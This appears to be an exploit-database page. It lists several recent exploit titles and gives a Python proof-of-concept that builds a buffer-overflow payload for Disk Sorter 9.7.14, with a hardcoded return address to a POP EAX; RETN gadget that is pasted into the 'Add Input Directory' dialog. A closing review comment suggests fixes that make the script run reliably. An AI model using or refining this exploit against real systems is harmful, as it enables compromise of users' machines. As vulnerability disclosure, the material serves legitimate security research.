
11 new exploits

Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow
DNSTracer 1.8.1 - Buffer Overflow
Parallels Desktop - Virtual Machine Escape
Subsonic 6.1.1 - XML External Entity Injection
BIND 9.10.5 - Unquoted Service Path Privilege Escalation
Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution
Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection
EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution
Subsonic 6.1.1 - Cross-Site Request Forgery
Subsonic 6.1.1 - Server-Side Request Forgery
Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
27 lines
No EOL
980 B
Python
Executable file
#!/usr/bin/python

######################################
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
# Date: 25 May 2017
# Exploit Author: n3ckD_
# Vendor Homepage: http://www.disksorter.com/
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
# Version: Disk Sorter v9.7.14 (32-Bit)
# Tested on: Windows 7 Enterprise SP1 (Build 7601)
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
######################################

print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"

# in libspg:.text
# 10147C1C 58 POP EAX
# 10147C1D C3 RETN
ret = "\x1c\x7c\x14\x10"

nops = "\x47\x4F"*24
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"

f = open("poc.txt","w")
f.write(buf)
f.close()
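Review bot: the two `print` statements are Python 2 syntax while the shebang is the unversioned `#!/usr/bin/python`, so the script stops with a SyntaxError wherever that path resolves to Python 3; pin the interpreter to Python 2 or switch to `print(...)`. The name `nops` is misleading, since `"\x47\x4F"` is the ASCII pair "GO" (INC EDI / DEC EDI on 32-bit x86) rather than 0x90, and a comment should say why that pair was chosen. The 4048-byte filler length and the trailing "MAGIC" marker are also undocumented: the header should state what the tester is expected to observe after pasting, so a vendor or defender can reproduce the crash and confirm a fix. Finally, `open("poc.txt","w")` is text mode, which on the Windows host named under "Tested on" rewrites the final "\n" as CRLF; `with open("poc.txt", "wb") as f:` keeps the bytes on disk identical to `buf` and closes the file on error.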